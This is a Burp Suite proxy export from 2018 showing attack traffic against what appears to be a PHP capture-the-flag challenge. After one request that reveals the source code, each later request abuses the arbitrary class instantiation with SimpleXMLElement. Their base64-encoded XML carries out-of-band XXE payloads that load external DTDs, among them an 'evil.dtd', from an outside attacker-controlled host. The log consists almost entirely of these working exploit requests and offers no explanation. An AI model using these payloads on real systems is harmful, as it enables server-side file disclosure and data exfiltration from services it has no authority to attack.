<?xml version="1.1"?>
<!-- NOTE: Any NULL bytes in requests and responses are preserved within this output, even though this strictly breaks the XML syntax. If your XML parser rejects the NULL bytes then you will need to remove or replace these bytes before parsing. Alternatively, you can use the option to base64-encode requests and responses. -->
<!DOCTYPE items [
<!ELEMENT items (item*)>
<!ATTLIST items burpVersion CDATA "">
<!ATTLIST items exportTime CDATA "">
<!ELEMENT item (time, url, host, port, protocol, method, path, extension, request, status, responselength, mimetype, response, comment)>
<!ELEMENT time (#PCDATA)>
<!ELEMENT url (#PCDATA)>
<!ELEMENT host (#PCDATA)>
<!ATTLIST host ip CDATA "">
<!ELEMENT port (#PCDATA)>
<!ELEMENT protocol (#PCDATA)>
<!ELEMENT method (#PCDATA)>
<!ELEMENT path (#PCDATA)>
<!ELEMENT extension (#PCDATA)>
<!ELEMENT request (#PCDATA)>
<!ATTLIST request base64 (true|false) "false">
<!ELEMENT status (#PCDATA)>
<!ELEMENT responselength (#PCDATA)>
<!ELEMENT mimetype (#PCDATA)>
<!ELEMENT response (#PCDATA)>
<!ATTLIST response base64 (true|false) "false">
<!ELEMENT comment (#PCDATA)>
]>
<items burpVersion="1.7.35" exportTime="Tue Dec 18 11:22:13 CST 2018">
  <item>
    <time>Tue Dec 18 11:10:22 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:4009/]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>4009</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET / HTTP/1.1
Host: 140.110.112.32:4009
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>200</status>
    <responselength>2348</responselength>
    <mimetype>XML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Date: Tue, 18 Dec 2018 03:10:23 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 2154
Connection: close
Content-Type: text/html; charset=UTF-8

<code><span style="color: #000000">
<span style="color: #0000BB">&lt;?php<br /></span><span style="color: #007700">include(</span><span style="color: #DD0000">"flag.php"</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">$controllerName&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'c'</span><span style="color: #007700">];<br />if&nbsp;(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$controllerName</span><span style="color: #007700">))&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$tmp&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'t'</span><span style="color: #007700">]);<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$controller&nbsp;</span><span style="color: #007700">=&nbsp;new&nbsp;</span><span style="color: #0000BB">$controllerName</span><span style="color: #007700">(</span><span style="color: #0000BB">$tmp</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'v'</span><span style="color: #007700">]);<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$controller</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">render</span><span style="color: #007700">();<br />}&nbsp;else&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;die(</span><span style="color: #0000BB">urldecode</span><span style="color: #007700">(</span><span style="color: #DD0000">'%F0%9F%92%A9'</span><span style="color: #007700">));<br />}<br /></span>
</span>
</code>￰ﾟﾒﾩ]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Tue Dec 18 11:10:48 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:4009/?c=SimpleXMLElement&t=%50%44%39%34%62%57%77%67%64%6d%56%79%63%32%6c%76%62%6a%30%69%4d%53%34%77%49%6a%38%2b%43%6a%77%68%52%45%39%44%56%46%6c%51%52%53%42%6b%59%58%52%68%49%46%73%4b%49%43%41%38%49%55%56%4f%56%45%6c%55%57%53%42%6b%59%58%52%68%49%46%4e%5a%55%31%52%46%54%53%41%69%61%48%52%30%63%44%6f%76%4c%7a%45%77%4e%43%34%78%4f%54%6b%75%4d%54%63%35%4c%6a%59%32%4c%79%49%2b%43%6c%30%2b%43%6a%78%6b%59%58%52%68%50%69%5a%6b%59%58%52%68%4f%7a%77%76%5a%47%46%30%59%54%34%3d&v=2]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>4009</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/?c=SimpleXMLElement&t=%50%44%39%34%62%57%77%67%64%6d%56%79%63%32%6c%76%62%6a%30%69%4d%53%34%77%49%6a%38%2b%43%6a%77%68%52%45%39%44%56%46%6c%51%52%53%42%6b%59%58%52%68%49%46%73%4b%49%43%41%38%49%55%56%4f%56%45%6c%55%57%53%42%6b%59%58%52%68%49%46%4e%5a%55%31%52%46%54%53%41%69%61%48%52%30%63%44%6f%76%4c%7a%45%77%4e%43%34%78%4f%54%6b%75%4d%54%63%35%4c%6a%59%32%4c%79%49%2b%43%6c%30%2b%43%6a%78%6b%59%58%52%68%50%69%5a%6b%59%58%52%68%4f%7a%77%76%5a%47%46%30%59%54%34%3d&v=2]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET /?c=SimpleXMLElement&t=%50%44%39%34%62%57%77%67%64%6d%56%79%63%32%6c%76%62%6a%30%69%4d%53%34%77%49%6a%38%2b%43%6a%77%68%52%45%39%44%56%46%6c%51%52%53%42%6b%59%58%52%68%49%46%73%4b%49%43%41%38%49%55%56%4f%56%45%6c%55%57%53%42%6b%59%58%52%68%49%46%4e%5a%55%31%52%46%54%53%41%69%61%48%52%30%63%44%6f%76%4c%7a%45%77%4e%43%34%78%4f%54%6b%75%4d%54%63%35%4c%6a%59%32%4c%79%49%2b%43%6c%30%2b%43%6a%78%6b%59%58%52%68%50%69%5a%6b%59%58%52%68%4f%7a%77%76%5a%47%46%30%59%54%34%3d&v=2 HTTP/1.1
Host: 140.110.112.32:4009
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32/challenges
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>500</status>
    <responselength>210</responselength>
    <mimetype></mimetype>
    <response base64="false"><![CDATA[HTTP/1.0 500 Internal Server Error
Date: Tue, 18 Dec 2018 03:10:49 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Tue Dec 18 11:10:56 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:4009/?c=SimpleXMLElement&t=%50%44%39%34%62%57%77%67%64%6d%56%79%63%32%6c%76%62%6a%30%69%4d%53%34%77%49%6a%38%2b%43%6a%77%68%52%45%39%44%56%46%6c%51%52%53%42%6b%59%58%52%68%49%46%73%4b%49%43%41%38%49%55%56%4f%56%45%6c%55%57%53%41%6c%49%47%52%30%5a%43%42%54%57%56%4e%55%52%55%30%67%49%6d%68%30%64%48%41%36%4c%79%38%78%4d%44%51%75%4d%54%6b%35%4c%6a%45%33%4f%53%34%32%4e%69%39%30%5a%58%4e%30%4c%6d%52%30%5a%43%49%2b%43%69%41%67%4a%57%52%30%5a%44%73%4b%58%54%34%4b%50%47%52%68%64%47%45%2b%5a%47%46%30%59%54%77%76%5a%47%46%30%59%54%34%3d&v=2]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>4009</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/?c=SimpleXMLElement&t=%50%44%39%34%62%57%77%67%64%6d%56%79%63%32%6c%76%62%6a%30%69%4d%53%34%77%49%6a%38%2b%43%6a%77%68%52%45%39%44%56%46%6c%51%52%53%42%6b%59%58%52%68%49%46%73%4b%49%43%41%38%49%55%56%4f%56%45%6c%55%57%53%41%6c%49%47%52%30%5a%43%42%54%57%56%4e%55%52%55%30%67%49%6d%68%30%64%48%41%36%4c%79%38%78%4d%44%51%75%4d%54%6b%35%4c%6a%45%33%4f%53%34%32%4e%69%39%30%5a%58%4e%30%4c%6d%52%30%5a%43%49%2b%43%69%41%67%4a%57%52%30%5a%44%73%4b%58%54%34%4b%50%47%52%68%64%47%45%2b%5a%47%46%30%59%54%77%76%5a%47%46%30%59%54%34%3d&v=2]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET /?c=SimpleXMLElement&t=%50%44%39%34%62%57%77%67%64%6d%56%79%63%32%6c%76%62%6a%30%69%4d%53%34%77%49%6a%38%2b%43%6a%77%68%52%45%39%44%56%46%6c%51%52%53%42%6b%59%58%52%68%49%46%73%4b%49%43%41%38%49%55%56%4f%56%45%6c%55%57%53%41%6c%49%47%52%30%5a%43%42%54%57%56%4e%55%52%55%30%67%49%6d%68%30%64%48%41%36%4c%79%38%78%4d%44%51%75%4d%54%6b%35%4c%6a%45%33%4f%53%34%32%4e%69%39%30%5a%58%4e%30%4c%6d%52%30%5a%43%49%2b%43%69%41%67%4a%57%52%30%5a%44%73%4b%58%54%34%4b%50%47%52%68%64%47%45%2b%5a%47%46%30%59%54%77%76%5a%47%46%30%59%54%34%3d&v=2 HTTP/1.1
Host: 140.110.112.32:4009
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32/challenges
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status></status>
    <responselength></responselength>
    <mimetype></mimetype>
    <response base64="false"></response>
    <comment></comment>
  </item>
  <item>
    <time>Tue Dec 18 11:11:04 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:4009/?c=SimpleXMLElement&t=%50%44%39%34%62%57%77%67%64%6d%56%79%63%32%6c%76%62%6a%30%69%4d%53%34%77%49%6a%38%2b%43%6a%77%68%52%45%39%44%56%46%6c%51%52%53%42%6b%59%58%52%68%49%46%73%4b%49%43%41%38%49%55%56%4f%56%45%6c%55%57%53%41%6c%49%47%52%30%5a%43%42%54%57%56%4e%55%52%55%30%67%49%6d%68%30%64%48%41%36%4c%79%38%78%4d%44%51%75%4d%54%6b%35%4c%6a%45%33%4f%53%34%32%4e%69%39%30%5a%58%4e%30%4d%69%35%6b%64%47%51%69%50%67%6f%67%49%43%56%6b%64%47%51%37%43%6c%30%2b%43%6a%78%6b%59%58%52%68%50%6d%52%68%64%47%45%38%4c%32%52%68%64%47%45%2b&v=2]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>4009</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/?c=SimpleXMLElement&t=%50%44%39%34%62%57%77%67%64%6d%56%79%63%32%6c%76%62%6a%30%69%4d%53%34%77%49%6a%38%2b%43%6a%77%68%52%45%39%44%56%46%6c%51%52%53%42%6b%59%58%52%68%49%46%73%4b%49%43%41%38%49%55%56%4f%56%45%6c%55%57%53%41%6c%49%47%52%30%5a%43%42%54%57%56%4e%55%52%55%30%67%49%6d%68%30%64%48%41%36%4c%79%38%78%4d%44%51%75%4d%54%6b%35%4c%6a%45%33%4f%53%34%32%4e%69%39%30%5a%58%4e%30%4d%69%35%6b%64%47%51%69%50%67%6f%67%49%43%56%6b%64%47%51%37%43%6c%30%2b%43%6a%78%6b%59%58%52%68%50%6d%52%68%64%47%45%38%4c%32%52%68%64%47%45%2b&v=2]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET /?c=SimpleXMLElement&t=%50%44%39%34%62%57%77%67%64%6d%56%79%63%32%6c%76%62%6a%30%69%4d%53%34%77%49%6a%38%2b%43%6a%77%68%52%45%39%44%56%46%6c%51%52%53%42%6b%59%58%52%68%49%46%73%4b%49%43%41%38%49%55%56%4f%56%45%6c%55%57%53%41%6c%49%47%52%30%5a%43%42%54%57%56%4e%55%52%55%30%67%49%6d%68%30%64%48%41%36%4c%79%38%78%4d%44%51%75%4d%54%6b%35%4c%6a%45%33%4f%53%34%32%4e%69%39%30%5a%58%4e%30%4d%69%35%6b%64%47%51%69%50%67%6f%67%49%43%56%6b%64%47%51%37%43%6c%30%2b%43%6a%78%6b%59%58%52%68%50%6d%52%68%64%47%45%38%4c%32%52%68%64%47%45%2b&v=2 HTTP/1.1
Host: 140.110.112.32:4009
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32/challenges
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status></status>
    <responselength></responselength>
    <mimetype></mimetype>
    <response base64="false"></response>
    <comment></comment>
  </item>
  <item>
    <time>Tue Dec 18 11:11:13 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:4009/?c=SimpleXMLElement&t=%50%44%39%34%62%57%77%67%64%6d%56%79%63%32%6c%76%62%6a%30%69%4d%53%34%77%49%6a%38%2b%43%6a%77%68%52%45%39%44%56%46%6c%51%52%53%42%6b%59%58%52%68%49%46%73%4b%49%43%41%38%49%55%56%4f%56%45%6c%55%57%53%41%6c%49%47%74%6c%65%53%41%69%55%31%6c%54%56%45%56%4e%49%6a%34%4b%49%43%41%38%49%55%56%4f%56%45%6c%55%57%53%41%6c%49%47%52%30%5a%43%42%54%57%56%4e%55%52%55%30%67%49%6d%68%30%64%48%41%36%4c%79%38%78%4d%44%51%75%4d%54%6b%35%4c%6a%45%33%4f%53%34%32%4e%69%39%30%5a%58%4e%30%4d%79%35%6b%64%47%51%69%50%67%6f%67%49%43%56%6b%64%47%51%37%43%6c%30%2b%43%6a%78%6b%59%58%52%68%50%6d%52%68%64%47%45%38%4c%32%52%68%64%47%45%2b&v=2]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>4009</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/?c=SimpleXMLElement&t=%50%44%39%34%62%57%77%67%64%6d%56%79%63%32%6c%76%62%6a%30%69%4d%53%34%77%49%6a%38%2b%43%6a%77%68%52%45%39%44%56%46%6c%51%52%53%42%6b%59%58%52%68%49%46%73%4b%49%43%41%38%49%55%56%4f%56%45%6c%55%57%53%41%6c%49%47%74%6c%65%53%41%69%55%31%6c%54%56%45%56%4e%49%6a%34%4b%49%43%41%38%49%55%56%4f%56%45%6c%55%57%53%41%6c%49%47%52%30%5a%43%42%54%57%56%4e%55%52%55%30%67%49%6d%68%30%64%48%41%36%4c%79%38%78%4d%44%51%75%4d%54%6b%35%4c%6a%45%33%4f%53%34%32%4e%69%39%30%5a%58%4e%30%4d%79%35%6b%64%47%51%69%50%67%6f%67%49%43%56%6b%64%47%51%37%43%6c%30%2b%43%6a%78%6b%59%58%52%68%50%6d%52%68%64%47%45%38%4c%32%52%68%64%47%45%2b&v=2]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET /?c=SimpleXMLElement&t=%50%44%39%34%62%57%77%67%64%6d%56%79%63%32%6c%76%62%6a%30%69%4d%53%34%77%49%6a%38%2b%43%6a%77%68%52%45%39%44%56%46%6c%51%52%53%42%6b%59%58%52%68%49%46%73%4b%49%43%41%38%49%55%56%4f%56%45%6c%55%57%53%41%6c%49%47%74%6c%65%53%41%69%55%31%6c%54%56%45%56%4e%49%6a%34%4b%49%43%41%38%49%55%56%4f%56%45%6c%55%57%53%41%6c%49%47%52%30%5a%43%42%54%57%56%4e%55%52%55%30%67%49%6d%68%30%64%48%41%36%4c%79%38%78%4d%44%51%75%4d%54%6b%35%4c%6a%45%33%4f%53%34%32%4e%69%39%30%5a%58%4e%30%4d%79%35%6b%64%47%51%69%50%67%6f%67%49%43%56%6b%64%47%51%37%43%6c%30%2b%43%6a%78%6b%59%58%52%68%50%6d%52%68%64%47%45%38%4c%32%52%68%64%47%45%2b&v=2 HTTP/1.1
Host: 140.110.112.32:4009
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32/challenges
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>500</status>
    <responselength>210</responselength>
    <mimetype></mimetype>
    <response base64="false"><![CDATA[HTTP/1.0 500 Internal Server Error
Date: Tue, 18 Dec 2018 03:11:14 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Tue Dec 18 11:11:23 CST 2018</time>
    <url><![CDATA[http://140.110.112.32:4009/?c=SimpleXMLElement&t=%50%44%39%34%62%57%77%67%64%6d%56%79%63%32%6c%76%62%6a%30%69%4d%53%34%77%49%6a%38%2b%43%6a%77%68%52%45%39%44%56%46%6c%51%52%53%42%6b%59%58%52%68%49%46%73%4b%49%43%41%38%49%55%56%4f%56%45%6c%55%57%53%41%6c%49%47%74%6c%65%53%41%69%55%31%6c%54%56%45%56%4e%49%6a%34%4b%49%43%41%38%49%55%56%4f%56%45%6c%55%57%53%41%6c%49%47%52%30%5a%43%42%54%57%56%4e%55%52%55%30%4b%49%43%41%69%61%48%52%30%63%44%6f%76%4c%7a%45%77%4e%43%34%78%4f%54%6b%75%4d%54%63%35%4c%6a%59%32%4c%32%56%32%61%57%77%75%5a%48%52%6b%49%6a%34%4b%49%43%41%6c%5a%48%52%6b%4f%77%70%64%50%67%6f%38%5a%47%46%30%59%54%34%6d%5a%6e%56%75%4f%7a%77%76%5a%47%46%30%59%54%34%3d&v=2]]></url>
    <host ip="140.110.112.32">140.110.112.32</host>
    <port>4009</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/?c=SimpleXMLElement&t=%50%44%39%34%62%57%77%67%64%6d%56%79%63%32%6c%76%62%6a%30%69%4d%53%34%77%49%6a%38%2b%43%6a%77%68%52%45%39%44%56%46%6c%51%52%53%42%6b%59%58%52%68%49%46%73%4b%49%43%41%38%49%55%56%4f%56%45%6c%55%57%53%41%6c%49%47%74%6c%65%53%41%69%55%31%6c%54%56%45%56%4e%49%6a%34%4b%49%43%41%38%49%55%56%4f%56%45%6c%55%57%53%41%6c%49%47%52%30%5a%43%42%54%57%56%4e%55%52%55%30%4b%49%43%41%69%61%48%52%30%63%44%6f%76%4c%7a%45%77%4e%43%34%78%4f%54%6b%75%4d%54%63%35%4c%6a%59%32%4c%32%56%32%61%57%77%75%5a%48%52%6b%49%6a%34%4b%49%43%41%6c%5a%48%52%6b%4f%77%70%64%50%67%6f%38%5a%47%46%30%59%54%34%6d%5a%6e%56%75%4f%7a%77%76%5a%47%46%30%59%54%34%3d&v=2]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET /?c=SimpleXMLElement&t=%50%44%39%34%62%57%77%67%64%6d%56%79%63%32%6c%76%62%6a%30%69%4d%53%34%77%49%6a%38%2b%43%6a%77%68%52%45%39%44%56%46%6c%51%52%53%42%6b%59%58%52%68%49%46%73%4b%49%43%41%38%49%55%56%4f%56%45%6c%55%57%53%41%6c%49%47%74%6c%65%53%41%69%55%31%6c%54%56%45%56%4e%49%6a%34%4b%49%43%41%38%49%55%56%4f%56%45%6c%55%57%53%41%6c%49%47%52%30%5a%43%42%54%57%56%4e%55%52%55%30%4b%49%43%41%69%61%48%52%30%63%44%6f%76%4c%7a%45%77%4e%43%34%78%4f%54%6b%75%4d%54%63%35%4c%6a%59%32%4c%32%56%32%61%57%77%75%5a%48%52%6b%49%6a%34%4b%49%43%41%6c%5a%48%52%6b%4f%77%70%64%50%67%6f%38%5a%47%46%30%59%54%34%6d%5a%6e%56%75%4f%7a%77%76%5a%47%46%30%59%54%34%3d&v=2 HTTP/1.1
Host: 140.110.112.32:4009
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://140.110.112.32/challenges
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

]]></request>
    <status>500</status>
    <responselength>210</responselength>
    <mimetype></mimetype>
    <response base64="false"><![CDATA[HTTP/1.0 500 Internal Server Error
Date: Tue, 18 Dec 2018 03:11:24 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

]]></response>
    <comment></comment>
  </item>
</items>
